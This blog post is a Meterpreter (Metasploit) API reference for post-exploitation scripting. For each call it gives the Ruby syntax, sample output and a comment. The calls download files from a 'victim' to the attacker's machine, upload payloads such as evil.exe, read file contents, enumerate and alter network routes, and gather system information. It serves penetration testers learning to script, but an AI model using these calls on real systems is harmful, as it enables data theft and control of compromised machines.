  1. 2012.07.26 [Metasploit]Meterpreter API Cheat Sheet

This page contains meterpreter methods with their syntax and output. The aim was to provide a quick reference for the meterpreter script developer. 

Rather than checking the code of already existing meterpreter scripts and searching for the relevant method, this page can be used as a one-stop shop.

Hope this will help newbies and enthusiasts like me who want to start writing their own meterpreter scripts.

P.S.: Not all the methods are covered, as this is all I can do in 3 hours. More to update soon :)

Get all the files/folders in a directory

Syntax: client.fs.dir.entries

Output: ["AUTOEXEC.BAT", "boot.ini", "CONFIG.SYS", "Documents and Settings"]

Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries("c:\\")

Output: ["sample_file.txt","dummy_directory","myfile.exe"] 

Comment: This will get the files and directories of c drive.

Get all the files/folders in a directory along with extra information

Syntax: client.fs.dir.entries_with_info

Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]

Comment: By default it will get the files and directories of present working directory.

Syntax: client.fs.dir.entries_with_info("c:\\")

Output: [{"FileName"=>".", "FilePath"=>"c:\\........ "st_atime"=>0, "st_mtime"=>1329581528}>}]

Comment: This will get the files and directories of c drive.

Change the directory

Syntax: client.fs.dir.chdir("c:\\")

Output: 0

Comment: This will change the present working directory to c drive.

Make directory

Syntax: client.fs.dir.mkdir("c:\\oldman")

Output: 0

Comment: This will make a directory named "oldman" in c drive.

Get current working directory

Syntax: client.fs.dir.pwd

Output: "c:\\oldmanlab"

Comment: This will give the current working directory name

Syntax: client.fs.dir.getwd

Output: "c:\\oldmanlab"

Comment: This will give the current working directory name

Delete a directory

Syntax: client.fs.dir.delete("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.rmdir("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.

Syntax: client.fs.dir.unlink("c:\\oldman")

Output: 0

Comment: This will delete the specified directory only if empty.

Download contents of a target directory

Syntax: client.fs.dir.download("/root/oldmanlab/","c:\\oldman")

Output: [".", "..", "firefox.lnk", "my_file.txt"]

Comment: This will download all the files inside the oldman directory of the victim and save them inside the oldmanlab directory of the attacker's system.

Upload contents of a local directory to the victim's system

Syntax: client.fs.dir.upload("c:\\oldman","/root/oldmanlab")

Output: [".", "..", "firefox.lnk", "my_file.txt"]

Comment: This will upload all the content inside the oldmanlab directory of the attacker to the oldman directory of the victim's system.

Get the file separator

Syntax: client.fs.file.separator

Output: \\

Comment: This will give the file separator used by the system (\\ for windows, / for unix).

Search for the specified file

Syntax: client.fs.file.search("c:\\oldman","hacking.txt")

Output: [{"path"=>"c:\\oldman\\lab", "name"=>"hacking.txt", "size"=>4}]

Comment: This will search for hacking.txt in the oldman directory and its subdirectories

Get the basename for the specified file

Syntax: client.fs.file.basename("c:\\oldman\\hacking.txt")

Output: hacking.txt

Comment: This will give the filename of the filepath specified. 

Expand path of the directory

Syntax: client.fs.file.expand_path("%TEMP%")

Output: "C:\\WINDOWS\\TEMP"

Comment: This will expand the specified shortcut (here the %TEMP% environment variable) to its absolute path.

Get the md5 of file

Syntax: client.fs.file.md5("c:\\oldman\\file.txt")

Output: "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'"

Comment: This will give the md5 sum of the specified file

Get the sha1 of file

Syntax: client.fs.file.sha1("c:\\oldman\\file.txt")

Output: "Q\xD0\b\xFF\xFA\xD8\xF4x7_\xAE\x911\xB4\xE12V\xB8\tw"

Comment: This will give the sha1 of the specified file
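
The md5 and sha1 outputs above are raw digest bytes (16 and 20 bytes), not the hex string that most hashing tools print. The following is an added example, not code from the original page: it converts such a raw digest to hex and checks a locally saved copy of a file against it. The helper names and the "abc" sample file are constructed for illustration.

```ruby
require "digest"
require "tempfile"

# Raw digest length in bytes => local digest class used to re-hash the copy.
DIGESTS = { 16 => Digest::MD5, 20 => Digest::SHA1 }.freeze

# The raw string shown as the md5 output on this page (16 bytes).
PAGE_MD5_RAW = "\x12,\x17~Fj\xFEq\xB7?'\x01;f\x7F'".b

# Hex form of a raw digest string, comparable with md5sum/sha1sum output.
def raw_digest_to_hex(raw)
  raw.b.unpack1("H*")
end

# Compare a raw digest reported for the original file with the digest of a
# local copy. Returns :match, :mismatch, or :unknown_algorithm when the
# digest length is neither 16 (MD5) nor 20 (SHA-1) bytes.
def verify_local_copy(raw_remote_digest, local_path)
  raw = raw_remote_digest.b            # force binary encoding before comparing
  algo = DIGESTS[raw.bytesize]
  return :unknown_algorithm unless algo

  local = algo.file(local_path).digest # raw bytes of the local copy's digest
  local == raw ? :match : :mismatch
end

if __FILE__ == $PROGRAM_NAME
  puts raw_digest_to_hex(PAGE_MD5_RAW)

  Tempfile.create("copy") do |f|
    f.write("abc")                     # constructed sample content
    f.flush
    # Constructed "remote" digest: the well-known MD5 of "abc".
    remote = ["900150983cd24fb0d6963f7d28e17f72"].pack("H*")
    puts verify_local_copy(remote, f.path)
  end
end
```
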

Check if specified file exists

Syntax: client.fs.file.exists?("c:\\oldman\\file.txt")

Output: true

Comment: This will return true if the file exists, else false.

Delete specified file

Syntax: client.fs.file.rm("c:\\oldman\\file.txt")

Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0 

Comment: This will delete the specified file.

Syntax: client.fs.file.unlink("c:\\oldman\\file.txt")

Output: Rex::Post::Meterpreter::Packet type=Response....meta=INT value=0 

Comment: This will delete the specified file.

Upload file to victim's system

Syntax: client.fs.file.upload("c:\\oldman","/root/lab/evil.exe")

Output: ["/root/lab/firefox.lnk"]

Comment: This will upload evil.exe from the attacker's system to the victim's oldman directory.

Download file from victim's system

Syntax: client.fs.file.download("/root/lab/secret.exe","c:\\oldman\\secret.exe")

Output: ["c:\\oldman\\secret.exe"]

Comment: This will download secret.exe from the victim's system and save it to the attacker's root directory.

Open a file in read mode and copy the content to some variable

Syntax: file1 = client.fs.file.new("c:\\oldman\\my_file.txt")
              temp = ""
              # read until end of file, appending each chunk to temp
              until file1.eof?
                temp << file1.read
              end
              file1.close

Output: N.A

Comment: This will copy all the data inside my_file.txt and store it in temp variable

List all the available interfaces from victim's system

Syntax: client.net.config.get_interfaces

Output: [......]

Comment: This will return an array of all the interfaces available in the victim's system along with details like IP, netmask, mac_address etc.

Syntax: client.net.config.get_interfaces[0]

Output: [......]

Comment: This will return an array of the first interface available in the victim's system along with details like IP, netmask, mac_address etc.

Get the IP address of specified interface

Syntax: client.net.config.get_interfaces[1].ip


Comment: This will give IP address of the second interface in the list.

List all the routes available in victim's system

Syntax: client.net.config.get_routes


Comment: This will return an array of all the routes available in the victim's system along with details like subnet, netmask, gateway.

Syntax: client.net.config.get_routes[0]


Comment: This will return an array of the first route available in the victim's system along with details like subnet, netmask, gateway.

Add a route in victim's system

Syntax: client.net.config.add_route("x.x.x.x","x.x.x.x","x.x.x.x")

Output: true

Comment: This will add a route in the victim's system. The first parameter is the subnet, the second is the netmask and the third is the gateway.

Remove specified route from victim's system

Syntax: client.net.config.remove_route("x.x.x.x","x.x.x.x","x.x.x.x")

Output: true

Comment: This will remove the route from the victim's system. The first parameter is the subnet, the second is the netmask and the third is the gateway.

Get the user id

Syntax: client.sys.config.getuid


Comment: This will give the user id of the victim system. It basically shows our access level.

Get the victim's computer name

Syntax: client.sys.config.sysinfo["Computer"]

Output: "WINXP-1337"

Comment: This will give the computer name of the compromised system.

Get the victim's operating system name and version

Syntax: client.sys.config.sysinfo["OS"]

Output: "Windows XP (Build 2600, Service Pack 2)."

Comment: This will give the name of the operating system running on the compromised system.

Get the victim's operating system architecture

Syntax: client.sys.config.sysinfo["Architecture"]

Output: "x86"

Comment: This will give the architecture (x86, 64-bit) of the operating system running on the compromised system.

Get the victim's operating system language

Syntax: client.sys.config.sysinfo["System Language"]

Output: "en_US"

Comment: This will give the operating system language of the compromised system.

Revert to previous user privileges

Syntax: client.sys.config.revert_to_self

Output: N.A

Comment: Let's say we had changed privilege from "NT AUTHORITY\\oldmanlab" to "NT AUTHORITY\\SYSTEM"; then revert to self will change our privileges back to "NT AUTHORITY\\oldmanlab".

Source - http://oldmanlab.blogspot.kr/p/meterpreter-api-cheat-sheet.html

Posted by extr